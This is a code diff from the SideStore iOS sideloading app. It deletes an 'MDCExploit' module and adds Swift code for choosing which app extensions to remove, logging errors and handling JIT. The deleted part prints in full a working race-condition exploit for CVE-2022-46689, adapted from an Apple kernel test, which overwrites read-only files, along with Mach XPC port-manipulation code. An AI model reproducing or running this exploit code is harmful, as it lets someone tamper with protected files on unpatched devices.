-  mach_port_t so0 = get_and_send_this_whatever_once_wow(client_port);
-  mach_port_t so1 = get_and_send_this_whatever_once_wow(client_port);
-
-  // insert a send so we maintain the ability to send to this port
-  err = mach_port_insert_right(mach_task_self(), client_port, client_port, MACH_MSG_TYPE_MAKE_SEND);
-  if (err != KERN_SUCCESS) {
-      //port right insertion failed:
-//    printf("weediuwe %s\n", mach_error_string(err));
-    return;
-  }
-
-  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
-  if (err != KERN_SUCCESS) {
-      //port allocation failed:
-//    printf("wuiq21d %s\n", mach_error_string(err));
-    return;
-  }
-
-  struct x_p_c_w_zerozero_t msg;
-  memset(&msg.hdr, 0, sizeof(msg));
-  msg.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
-  msg.hdr.msgh_size = sizeof(msg);
-  msg.hdr.msgh_remote_port = service_port;
-  msg.hdr.msgh_id   = 'w00t';
-
-  msg.body.msgh_descriptor_count = 2;
-
-  msg.client_port.name        = client_port;
-  msg.client_port.disposition = MACH_MSG_TYPE_MOVE_RECEIVE; // we still keep the send
-  msg.client_port.type        = MACH_MSG_PORT_DESCRIPTOR;
-
-  msg.reply_port.name        = reply_port;
-  msg.reply_port.disposition = MACH_MSG_TYPE_MAKE_SEND;
-  msg.reply_port.type        = MACH_MSG_PORT_DESCRIPTOR;
-
-  err = mach_msg(&msg.hdr,
-                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
-                 msg.hdr.msgh_size,
-                 0,
-                 MACH_PORT_NULL,
-                 MACH_MSG_TIMEOUT_NONE,
-                 MACH_PORT_NULL);
-
-  if (err != KERN_SUCCESS) {
-      //w00t message send failed:
-//    printf("ondwehu %s\n", mach_error_string(err));
-    return;
-  } else {
-      //sent xpc w00t message\n
-//    printf("wq98ywqe");
-  }
-
-  mach_port_deallocate(mach_task_self(), so0);
-  mach_port_deallocate(mach_task_self(), so1);
-
-  return;
-}

AltStore/MDCExploit/vm_unalign_csr.c

@@ -1,370 +0,0 @@
-// from https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c
-// modified to compile outside of XNU
-
-#include <pthread.h>
-#include <dispatch/dispatch.h>
-#include <stdio.h>
-
-#include <mach/mach_init.h>
-#include <mach/mach_port.h>
-#include <mach/vm_map.h>
-
-#include <fcntl.h>
-#include <sys/mman.h>
-
-//vm_unaligned_copy_switch_race
-#include "vm_unalign_csr.h"
-
-#define T_QUIET
-#define T_EXPECT_MACH_SUCCESS(a, b)
-#define T_EXPECT_MACH_ERROR(a, b, c)
-#define T_ASSERT_MACH_SUCCESS(a, b, ...)
-#define T_ASSERT_MACH_ERROR(a, b, c)
-#define T_ASSERT_POSIX_SUCCESS(a, b)
-#define T_ASSERT_EQ(a, b, c) do{if ((a) != (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
-#define T_ASSERT_NE(a, b, c) do{if ((a) == (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
-#define T_ASSERT_TRUE(a, b, ...)
-#define T_LOG(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
-#define T_DECL(a, b) static void a(void)
-#define T_PASS(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
-
-struct contextual_structure {
-	vm_size_t ob_sizing;
-	vm_address_t vmaddress_zeroe;
-	mach_port_t memory_entry_r_o;
-	mach_port_t memory_entry_r_w;
-	dispatch_semaphore_t currently_active_sem;
-	pthread_mutex_t mutex_thingy;
-	volatile bool finished;
-};
-
-//switcheroo_thread
-static void *
-sro_thread(__unused void *arg)
-{
-	kern_return_t kr;
-	struct contextual_structure *ctx;
-
-	ctx = (struct contextual_structure *)arg;
-	/* tell main thread we're ready to run */
-	dispatch_semaphore_signal(ctx->currently_active_sem);
-	while (!ctx->finished) {
-		/* wait for main thread to be done setting things up */
-		pthread_mutex_lock(&ctx->mutex_thingy);
-		if (ctx->finished) {
-      pthread_mutex_unlock(&ctx->mutex_thingy);
-			break;
-		}
-		/* switch e0 to RW mapping */
-		kr = vm_map(mach_task_self(),
-		    &ctx->vmaddress_zeroe,
-		    ctx->ob_sizing,
-		    0,         /* mask */
-		    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
-		    ctx->memory_entry_r_w,
-		    0,
-		    FALSE,         /* copy */
-		    VM_PROT_READ | VM_PROT_WRITE,
-		    VM_PROT_READ | VM_PROT_WRITE,
-		    VM_INHERIT_DEFAULT);
-		T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RW");
-		/* wait a little bit */
-		usleep(100);
-		/* switch bakc to original RO mapping */
-		kr = vm_map(mach_task_self(),
-		    &ctx->vmaddress_zeroe,
-		    ctx->ob_sizing,
-		    0,         /* mask */
-		    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
-		    ctx->memory_entry_r_o,
-		    0,
-		    FALSE,         /* copy */
-		    VM_PROT_READ,
-		    VM_PROT_READ,
-		    VM_INHERIT_DEFAULT);
-		T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RO");
-		/* tell main thread we're don switching mappings */
-		pthread_mutex_unlock(&ctx->mutex_thingy);
-		usleep(100);
-	}
-	return NULL;
-}
-
-//unaligned_copy_switch_race
-bool unalign_csr(int file_to_bake, off_t the_offset_of_the_file, const void* what_do_we_overwrite_this_file_with, size_t what_is_the_length_of_this_overwrite_data) {
-	bool retval = false;
-	pthread_t th = NULL;
-	int ret;
-	kern_return_t kr;
-	time_t start, duration;
-#if 0
-	mach_msg_type_number_t cow_read_size;
-#endif
-	vm_size_t copied_size;
-	int loops;
-	vm_address_t e2, e5;
-	struct contextual_structure context1, *ctx;
-	int kern_success = 0, kern_protection_failure = 0, kern_other = 0;
-	vm_address_t ro_addr, tmp_addr;
-	memory_object_size_t mo_size;
-
-	ctx = &context1;
-	ctx->ob_sizing = 256 * 1024;
-
-	void* file_mapped = mmap(NULL, ctx->ob_sizing, PROT_READ, MAP_SHARED, file_to_bake, the_offset_of_the_file);
-	if (file_mapped == MAP_FAILED) {
-//		fprintf(stderr, "failed to map\n");
-		return false;
-	}
-	if (!memcmp(file_mapped, what_do_we_overwrite_this_file_with, what_is_the_length_of_this_overwrite_data)) {
-//		fprintf(stderr, "already the same?\n");
-		munmap(file_mapped, ctx->ob_sizing);
-		return true;
-	}
-	ro_addr = (vm_address_t)file_mapped;
-
-	ctx->vmaddress_zeroe = 0;
-	ctx->currently_active_sem = dispatch_semaphore_create(0);
-    //c=dispatch_semaphore_create
-	T_QUIET; T_ASSERT_NE(ctx->currently_active_sem, NULL, "wqdwqd");
-	ret = pthread_mutex_init(&ctx->mutex_thingy, NULL);
-	T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_mutex_init");
-	ctx->finished = false;
-	ctx->memory_entry_r_w = MACH_PORT_NULL;
-	ctx->memory_entry_r_o = MACH_PORT_NULL;
-#if 0
-	/* allocate our attack target memory */
-	kr = vm_allocate(mach_task_self(),
-	    &ro_addr,
-	    ctx->ob_sizing,
-	    VM_FLAGS_ANYWHERE);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate ro_addr");
-	/* initialize to 'A' */
-	memset((char *)ro_addr, 'A', ctx->ob_sizing);
-#endif
-
-	/* make it read-only */
-	kr = vm_protect(mach_task_self(),
-	    ro_addr,
-	    ctx->ob_sizing,
-	    TRUE,             /* set_maximum */
-	    VM_PROT_READ);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_protect ro_addr");
-	/* make sure we can't get read-write handle on that target memory */
-	mo_size = ctx->ob_sizing;
-	kr = mach_make_memory_entry_64(mach_task_self(),
-	    &mo_size,
-	    ro_addr,
-	    MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
-	    &ctx->memory_entry_r_o,
-	    MACH_PORT_NULL);
-	T_QUIET; T_ASSERT_MACH_ERROR(kr, KERN_PROTECTION_FAILURE, "make_mem_entry() RO");
-	/* take read-only handle on that target memory */
-	mo_size = ctx->ob_sizing;
-	kr = mach_make_memory_entry_64(mach_task_self(),
-	    &mo_size,
-	    ro_addr,
-	    MAP_MEM_VM_SHARE | VM_PROT_READ,
-	    &ctx->memory_entry_r_o,
-	    MACH_PORT_NULL);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RO");
-    //c= wrong mem_entry size
-	T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->ob_sizing, "uwdihiu");
-	/* make sure we can't map target memory as writable */
-	tmp_addr = 0;
-	kr = vm_map(mach_task_self(),
-	    &tmp_addr,
-	    ctx->ob_sizing,
-	    0,         /* mask */
-	    VM_FLAGS_ANYWHERE,
-	    ctx->memory_entry_r_o,
-	    0,
-	    FALSE,         /* copy */
-	    VM_PROT_READ,
-	    VM_PROT_READ | VM_PROT_WRITE,
-	    VM_INHERIT_DEFAULT);
-	T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
-	tmp_addr = 0;
-	kr = vm_map(mach_task_self(),
-	    &tmp_addr,
-	    ctx->ob_sizing,
-	    0,         /* mask */
-	    VM_FLAGS_ANYWHERE,
-	    ctx->memory_entry_r_o,
-	    0,
-	    FALSE,         /* copy */
-	    VM_PROT_READ | VM_PROT_WRITE,
-	    VM_PROT_READ | VM_PROT_WRITE,
-	    VM_INHERIT_DEFAULT);
-	T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
-
-	/* allocate a source buffer for the unaligned copy */
-	kr = vm_allocate(mach_task_self(),
-	    &e5,
-	    ctx->ob_sizing * 2,
-	    VM_FLAGS_ANYWHERE);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e5");
-	/* initialize to 'C' */
-	memset((char *)e5, 'C', ctx->ob_sizing * 2);
-
-	char* e5_overwrite_ptr = (char*)(e5 + ctx->ob_sizing - 1);
-	memcpy(e5_overwrite_ptr, what_do_we_overwrite_this_file_with, what_is_the_length_of_this_overwrite_data);
-
-	int overwrite_first_diff_offset = -1;
-	char overwrite_first_diff_value = 0;
-	for (int off = 0; off < what_is_the_length_of_this_overwrite_data; off++) {
-		if (((char*)ro_addr)[off] != e5_overwrite_ptr[off]) {
-			overwrite_first_diff_offset = off;
-			overwrite_first_diff_value = ((char*)ro_addr)[off];
-		}
-	}
-	if (overwrite_first_diff_offset == -1) {
-        //b=no diff?
-		fprintf(stderr, "uewiyfih");
-		return false;
-	}
-
-	/*
-	 * get a handle on some writable memory that will be temporarily
-	 * switched with the read-only mapping of our target memory to try
-	 * and trick copy_unaligned to write to our read-only target.
-	 */
-	tmp_addr = 0;
-	kr = vm_allocate(mach_task_self(),
-	    &tmp_addr,
-	    ctx->ob_sizing,
-	    VM_FLAGS_ANYWHERE);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate() some rw memory");
-	/* initialize to 'D' */
-	memset((char *)tmp_addr, 'D', ctx->ob_sizing);
-	/* get a memory entry handle for that RW memory */
-	mo_size = ctx->ob_sizing;
-	kr = mach_make_memory_entry_64(mach_task_self(),
-	    &mo_size,
-	    tmp_addr,
-	    MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
-	    &ctx->memory_entry_r_w,
-	    MACH_PORT_NULL);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RW");
-    //c=wrong mem_entry size
-	T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->ob_sizing, "weouhdqhuow");
-	kr = vm_deallocate(mach_task_self(), tmp_addr, ctx->ob_sizing);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate() tmp_addr 0x%llx", (uint64_t)tmp_addr);
-	tmp_addr = 0;
-
-	pthread_mutex_lock(&ctx->mutex_thingy);
-
-	/* start racing thread */
-	ret = pthread_create(&th, NULL, sro_thread, (void *)ctx);
-	T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create");
-
-	/* wait for racing thread to be ready to run */
-	dispatch_semaphore_wait(ctx->currently_active_sem, DISPATCH_TIME_FOREVER);
-
-	duration = 10; /* 10 seconds */
-//	T_LOG("Testing for %ld seconds...", duration);
-	for (start = time(NULL), loops = 0;
-	    time(NULL) < start + duration;
-	    loops++) {
-		/* reserve space for our 2 contiguous allocations */
-		e2 = 0;
-		kr = vm_allocate(mach_task_self(),
-		    &e2,
-		    2 * ctx->ob_sizing,
-		    VM_FLAGS_ANYWHERE);
-		T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate to reserve e2+e0");
-
-		/* make 1st allocation in our reserved space */
-		kr = vm_allocate(mach_task_self(),
-		    &e2,
-		    ctx->ob_sizing,
-		    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(240));
-		T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e2");
-		/* initialize to 'B' */
-		memset((char *)e2, 'B', ctx->ob_sizing);
-
-		/* map our read-only target memory right after */
-		ctx->vmaddress_zeroe = e2 + ctx->ob_sizing;
-		kr = vm_map(mach_task_self(),
-		    &ctx->vmaddress_zeroe,
-		    ctx->ob_sizing,
-		    0,         /* mask */
-		    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(241),
-		    ctx->memory_entry_r_o,
-		    0,
-		    FALSE,         /* copy */
-		    VM_PROT_READ,
-		    VM_PROT_READ,
-		    VM_INHERIT_DEFAULT);
-		T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() mem_entry_ro");
-
-		/* let the racing thread go */
-		pthread_mutex_unlock(&ctx->mutex_thingy);
-		/* wait a little bit */
-		usleep(100);
-
-		/* trigger copy_unaligned while racing with other thread */
-		kr = vm_read_overwrite(mach_task_self(),
-		    e5,
-		    ctx->ob_sizing - 1 + what_is_the_length_of_this_overwrite_data,
-		    e2 + 1,
-		    &copied_size);
-		T_QUIET;
-		T_ASSERT_TRUE(kr == KERN_SUCCESS || kr == KERN_PROTECTION_FAILURE,
-		    "vm_read_overwrite kr %d", kr);
-		switch (kr) {
-		case KERN_SUCCESS:
-			/* the target was RW */
-			kern_success++;
-			break;
-		case KERN_PROTECTION_FAILURE:
-			/* the target was RO */
-			kern_protection_failure++;
-			break;
-		default:
-			/* should not happen */
-			kern_other++;
-			break;
-		}
-		/* check that our read-only memory was not modified */
-#if 0
-        //c = RO mapping was modified
-		T_QUIET; T_ASSERT_EQ(((char *)ro_addr)[overwrite_first_diff_offset], overwrite_first_diff_value, "cddwq");
-#endif
-		bool is_still_equal = ((char *)ro_addr)[overwrite_first_diff_offset] == overwrite_first_diff_value;
-
-		/* tell racing thread to stop toggling mappings */
-		pthread_mutex_lock(&ctx->mutex_thingy);
-
-		/* clean up before next loop */
-		vm_deallocate(mach_task_self(), ctx->vmaddress_zeroe, ctx->ob_sizing);
-		ctx->vmaddress_zeroe = 0;
-		vm_deallocate(mach_task_self(), e2, ctx->ob_sizing);
-		e2 = 0;
-		if (!is_still_equal) {
-			retval = true;
-//			fprintf(stderr, "RO mapping was modified\n");
-			break;
-		}
-	}
-
-	ctx->finished = true;
-	pthread_mutex_unlock(&ctx->mutex_thingy);
-	pthread_join(th, NULL);
-
-	kr = mach_port_deallocate(mach_task_self(), ctx->memory_entry_r_w);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_rw)");
-	kr = mach_port_deallocate(mach_task_self(), ctx->memory_entry_r_o);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_ro)");
-	kr = vm_deallocate(mach_task_self(), ro_addr, ctx->ob_sizing);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(ro_addr)");
-	kr = vm_deallocate(mach_task_self(), e5, ctx->ob_sizing * 2);
-	T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(e5)");
-
-//#if 0
-//	T_LOG("vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d",
-//	    kern_success, kern_protection_failure, kern_other);
-//	T_PASS("Ran %d times in %ld seconds with no failure", loops, duration);
-//#endif
-	return retval;
-}

AltStore/MDCExploit/vm_unalign_csr.h

@@ -1,8 +0,0 @@
-#pragma once
-#include <stdlib.h>
-#include <stdbool.h>
-/// Uses CVE-2022-46689 to overwrite `overwrite_length` bytes of `file_to_overwrite` with `overwrite_data`, starting from `file_offset`.
-/// `file_to_overwrite` should be a file descriptor opened with O_RDONLY.
-/// `overwrite_length` must be less than or equal to `PAGE_SIZE`.
-/// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable.
-bool unalign_csr(int file_to_bake, off_t the_offset_of_the_file, const void* what_do_we_overwrite_this_file_with, size_t what_is_the_length_of_this_overwrite_data);

AltStore/Managing Apps/AppExtensionView.swift

@@ -0,0 +1,81 @@
+//
+//  AppExtensionView.swift
+//  SideStore
+//
+//  Created by June P on 8/17/24.
+//  Copyright © 2024 SideStore. All rights reserved.
+//
+
+import SwiftUI
+import CAltSign
+
+extension ALTApplication: Identifiable {}
+
+struct AppExtensionView: View {
+    var extensions: Set<ALTApplication>
+    @State var selection: [ALTApplication] = []
+        
+    var completion: (_ selection: [ALTApplication]) -> Any?
+    
+    var body: some View {
+        NavigationView {
+            List {
+                ForEach(self.extensions.sorted {
+                    $0.bundleIdentifier < $1.bundleIdentifier
+                }, id: \.self) { item in
+                    MultipleSelectionRow(title: item.bundleIdentifier, isSelected: !selection.contains(item)) {
+                        if self.selection.contains(item) {
+                            self.selection.removeAll(where: { $0 == item })
+                        }
+                        else {
+                            self.selection.append(item)
+                        }
+                    }
+                }
+            }
+            .navigationTitle("App Extensions")
+            .onDisappear {
+                _ = completion(selection)
+            }
+        }
+    }
+}
+
+struct MultipleSelectionRow: View {
+    var title: String
+    var isSelected: Bool
+    var action: () -> Void
+
+    var body: some View {
+        SwiftUI.Button(action: self.action) {
+            HStack {
+                Text(self.title)
+                if self.isSelected {
+                    Spacer()
+                    Image(systemName: "checkmark")
+                }
+            }
+        }
+    }
+}
+
+class AppExtensionViewHostingController: UIHostingController<AppExtensionView> {
+    
+    
+    var completion: Optional<(_ selection: [ALTApplication]) -> Any?> = nil
+    
+    required init(extensions: Set<ALTApplication>, completion: @escaping (_ selection: [ALTApplication]) -> Any?) {
+        self.completion = completion
+        super.init(rootView: AppExtensionView(extensions: extensions, completion: completion))
+    }
+    
+    @MainActor required dynamic init?(coder aDecoder: NSCoder) {
+        super.init(coder: aDecoder)
+    }
+}
+
+extension AppExtensionViewHostingController: UIPopoverPresentationControllerDelegate {
+    func adaptivePresentationStyle(for controller: UIPresentationController) -> UIModalPresentationStyle {
+        return .none
+    }
+}

AltStore/Managing Apps/AppManager.swift

@@ -8,12 +8,14 @@
 
 import Foundation
 import UIKit
+import SwiftUI
 import UserNotifications
 import MobileCoreServices
 import Intents
 import Combine
 import WidgetKit
 
+import minimuxer
 import AltStoreCore
 import AltSign
 import Roxas
@@ -37,17 +39,12 @@ final class AppManagerPublisher: ObservableObject
     fileprivate(set) var refreshProgress = [String: Progress]()
 }
 
-private func ==(lhs: OperatingSystemVersion, rhs: OperatingSystemVersion) -> Bool
-{
-    return (lhs.majorVersion == rhs.majorVersion && lhs.minorVersion == rhs.minorVersion && lhs.patchVersion == rhs.patchVersion)
-}
-
 final class AppManager
 {
     static let shared = AppManager()
     
     private(set) var updatePatronsResult: Result<Void, Error>?
-    
+        
     private let operationQueue = OperationQueue()
     private let serialOperationQueue = OperationQueue()
 
@@ -243,7 +240,7 @@ extension AppManager
     
     func deactivateApps(for app: ALTApplication, presentingViewController: UIViewController, completion: @escaping (Result<Void, Error>) -> Void)
     {
-        guard let activeAppsLimit = UserDefaults.standard.activeAppsLimit else { return completion(.success(())) }
+        guard !UserDefaults.standard.isAppLimitDisabled, let activeAppsLimit = UserDefaults.standard.activeAppsLimit else { return completion(.success(())) }
         
         DispatchQueue.main.async {
             let activeApps = InstalledApp.fetchActiveApps(in: DatabaseManager.shared.viewContext)
@@ -307,6 +304,45 @@ extension AppManager
             presentingViewController.present(alertController, animated: true, completion: nil)
         }
     }
+    
+    func clearAppCache(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let clearAppCacheOperation = ClearAppCacheOperation()
+        clearAppCacheOperation.resultHandler = { result in
+            completion(result)
+        }
+        
+        self.run([clearAppCacheOperation], context: nil)
+    }
+
+    func log(_ error: Error, operation: LoggedError.Operation, app: AppProtocol)
+    {
+        switch error {
+        case ~OperationError.Code.cancelled: return // Don't log cancelled events
+        default: break
+        }
+        // Sanitize NSError on same thread before performing background task.
+        let sanitizedError = (error as NSError).sanitizedForSerialization()
+
+        DatabaseManager.shared.persistentContainer.performBackgroundTask { context in
+            var app = app
+            if let managedApp = app as? NSManagedObject, let tempApp = context.object(with: managedApp.objectID) as? AppProtocol
+            {
+                app = tempApp
+            }
+
+            do
+            {
+                _ = LoggedError(error: sanitizedError, app: app, operation: operation, context: context)
+                try context.save()
+            }
+            catch let saveError
+            {
+                print("[ALTLog] Failed to log error \(sanitizedError.domain) code \(sanitizedError.code) for \(app.bundleIdentifier):", saveError)
+            }
+        }
+    }
+
 }
 
 extension AppManager
@@ -359,7 +395,7 @@ extension AppManager
                     case .success(let source): fetchedSources.insert(source)
                     case .failure(let error):
                         let source = managedObjectContext.object(with: source.objectID) as! Source
-                        source.error = (error as NSError).sanitizedForCoreData()
+                        source.error = (error as NSError).sanitizedForSerialization()
                         errors[source] = error
                     }
                     
@@ -447,7 +483,7 @@ extension AppManager
         group.completionHandler = { (results) in
             do
             {
-                guard let result = results.values.first else { throw context.error ?? OperationError.unknown }
+                guard let result = results.values.first else { throw context.error ?? OperationError.unknown() }
                 completionHandler(result)
             }
             catch
@@ -466,7 +502,7 @@ extension AppManager
     func update(_ app: InstalledApp, presentingViewController: UIViewController?, context: AuthenticatedOperationContext = AuthenticatedOperationContext(), completionHandler: @escaping (Result<InstalledApp, Error>) -> Void) -> Progress
     {
         guard let storeApp = app.storeApp else {
-            completionHandler(.failure(OperationError.appNotFound))
+            completionHandler(.failure(OperationError.appNotFound(name: app.name)))
             return Progress.discreteProgress(totalUnitCount: 1)
         }
         
@@ -474,7 +510,7 @@ extension AppManager
         group.completionHandler = { (results) in
             do
             {
-                guard let result = results.values.first else { throw OperationError.unknown }
+                guard let result = results.values.first else { throw OperationError.unknown() }
                 completionHandler(result)
             }
             catch
@@ -510,8 +546,8 @@ extension AppManager
         group.completionHandler = { (results) in
             do
             {
-                guard let result = results.values.first else { throw OperationError.unknown }
-                
+                guard let result = results.values.first else { throw OperationError.unknown() }
+
                 let installedApp = try result.get()
                 assert(installedApp.managedObjectContext != nil)
                 
@@ -549,7 +585,7 @@ extension AppManager
             group.completionHandler = { (results) in
                 do
                 {
-                    guard let result = results.values.first else { throw OperationError.unknown }
+                    guard let result = results.values.first else { throw OperationError.unknown() }
 
                     let installedApp = try result.get()
                     assert(installedApp.managedObjectContext != nil)
@@ -575,8 +611,8 @@ extension AppManager
         group.completionHandler = { (results) in
             do
             {
-                guard let result = results.values.first else { throw OperationError.unknown }
-                
+                guard let result = results.values.first else { throw OperationError.unknown() }
+
                 let installedApp = try result.get()
                 assert(installedApp.managedObjectContext != nil)
                 
@@ -600,7 +636,7 @@ extension AppManager
         group.completionHandler = { (results) in
             do
             {
-                guard let result = results.values.first else { throw OperationError.unknown }
+                guard let result = results.values.first else { throw OperationError.unknown() }
                 
                 let installedApp = try result.get()
                 assert(installedApp.managedObjectContext != nil)
@@ -670,13 +706,20 @@ extension AppManager
             var installedApp: InstalledApp?
         }
         
+        let appName = installedApp.name
         let context = Context()
         context.installedApp = installedApp
         
         
         let enableJITOperation = EnableJITOperation(context: context)
         enableJITOperation.resultHandler = { (result) in
-            completionHandler(result)
+            switch result {
+            case .success: completionHandler(.success(()))
+            case .failure(let nsError as NSError):
+                let localizedTitle = String(format: NSLocalizedString("Failed to enable JIT for %@", comment: ""), appName)
+                let error = nsError.withLocalizedTitle(localizedTitle)
+                self.log(error, operation: .enableJIT, app: installedApp)
+            }
         }
         
         self.run([enableJITOperation], context: context, requiresSerialQueue: true)
@@ -754,6 +797,12 @@ extension AppManager
         let progress = self.refreshProgress[app.bundleIdentifier]
         return progress
     }
+    
+    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
+    {
+        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
+        return isActivelyManaging
+    }
 }
 
 extension AppManager
@@ -806,12 +855,18 @@ private extension AppManager
             
             return bundleIdentifier
         }
-    }
-    
-    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
-    {
-        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
-        return isActivelyManaging
+
+        var loggedErrorOperation: LoggedError.Operation {
+            switch self {
+            case .install: return .install
+            case .update: return .update
+            case .refresh: return .refresh
+            case .activate: return .activate
+            case .deactivate: return .deactivate
+            case .backup: return .backup
+            case .restore: return .restore
+            }
+        }
     }
     
     @discardableResult
@@ -876,7 +931,9 @@ private extension AppManager
 
                     if app.certificateSerialNumber != group.context.certificate?.serialNumber ||
                         uti != nil ||
-                        app.needsResign
+                        app.needsResign ||
+                        // We need to reinstall ourselves on refresh to ensure the new provisioning profile is used
+                        app.bundleIdentifier == StoreApp.altstoreAppID
                     {
                         // Resign app instead of just refreshing profiles because either:
                         // * Refreshing using different certificate
@@ -946,12 +1003,135 @@ private extension AppManager
         }
         else
         {
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = UserDefaults.standard.isIdleTimeoutDisableEnabled
+            }
             performAppOperations()
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = false
+            }
         }
         
         return group
     }
     
+    func removeAppExtensions(from application: ALTApplication, existingApp: InstalledApp?, extensions: Set<ALTApplication>, _ presentingViewController: UIViewController?, completion: @escaping (Result<Void, Error>) -> Void)
+    {
+            
+        //App-Extensions: Ensure existing app's extensions and currently installing app's extensions must match
+        let existingAppEx: Set<InstalledExtension> = existingApp?.appExtensions ?? Set()
+        let currentAppEx: Set<ALTApplication> = application.appExtensions
+        
+        let currentAppExNames  = currentAppEx.map{ appEx in appEx.bundleIdentifier}
+        let existingAppExNames = existingAppEx.map{ appEx in appEx.bundleIdentifier}
+
+        let excessExtensions = currentAppEx.filter{
+            !(existingAppExNames.contains($0.bundleIdentifier))
+        }
+        
+        let isMatching = (currentAppEx.count == existingAppEx.count) && excessExtensions.isEmpty
+        let diagnosticsMsg = "AppManager.removeAppExtensions: App Extensions in existingApp and currentApp are matching: \(isMatching)\n"
+                           + "AppManager.removeAppExtensions: existingAppEx: \(existingAppExNames); currentAppEx: \(String(describing: currentAppExNames))\n"
+        print(diagnosticsMsg)
+     
+        // if background mode, then remove only the excess extensions
+        guard let presentingViewController: UIViewController = presentingViewController else {
+            // perform silent extensions cleanup for those that aren't already present in existing app
+            print("\n    Performing background mode Extensions removal    \n")
+            print("AppManager.removeAppExtensions: Excess Extensions: \(excessExtensions)")
+            
+            do {
+                for appExtension in excessExtensions {
+                    print("Deleting extension \(appExtension.bundleIdentifier)")
+                    try FileManager.default.removeItem(at: appExtension.fileURL)
+                }
+                return completion(.success(()))
+            } catch {
+                return completion(.failure(error))
+            }
+        }
+     
+        guard !application.appExtensions.isEmpty else { return completion(.success(())) }
+        
+        let firstSentence: String
+        
+        if UserDefaults.standard.activeAppLimitIncludesExtensions
+        {
+            firstSentence = NSLocalizedString("Non-developer Apple IDs are limited to 3 active apps and app extensions.", comment: "")
+        }
+        else
+        {
+            firstSentence = NSLocalizedString("Non-developer Apple IDs are limited to creating 10 App IDs per week.", comment: "")
+        }
+        
+        let message = firstSentence + " " + NSLocalizedString("Would you like to remove this app's extensions so they don't count towards your limit? There are \(extensions.count) Extensions", comment: "")
+        
+        let alertController = UIAlertController(title: NSLocalizedString("App Contains Extensions", comment: ""), message: message, preferredStyle: .alert)
+        alertController.addAction(UIAlertAction(title: UIAlertAction.cancel.title, style: UIAlertAction.cancel.style, handler: { (action) in
+            completion(.failure(OperationError.cancelled))
+        }))
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Keep App Extensions", comment: ""), style: .default) { (action) in
+            completion(.success(()))
+        })
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Remove App Extensions", comment: ""), style: .destructive) { (action) in
+            do
+            {
+                for appExtension in application.appExtensions
+                {
+                    print("Deleting extension \(appExtension.bundleIdentifier)")
+                    try FileManager.default.removeItem(at: appExtension.fileURL)
+                }
+                
+                completion(.success(()))
+            }
+            catch
+            {
+                completion(.failure(error))
+            }
+        })
+        
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Choose App Extensions", comment: ""), style: .default) { (action) in
+            let popoverContentController = AppExtensionViewHostingController(extensions: extensions) { (selection) in
+                do
+                {
+                    for appExtension in selection
+                    {
+                        print("Deleting extension \(appExtension.bundleIdentifier)")
+                        
+                        try FileManager.default.removeItem(at: appExtension.fileURL)
+                    }
+                    completion(.success(()))
+                }
+                catch
+                {
+                    completion(.failure(error))
+                }
+                return nil
+            }
+            
+            let suiview = popoverContentController.view!
+            suiview.translatesAutoresizingMaskIntoConstraints = false
+            
+            popoverContentController.modalPresentationStyle = .popover
+            
+            if let popoverPresentationController = popoverContentController.popoverPresentationController {
+                popoverPresentationController.sourceView = presentingViewController.view
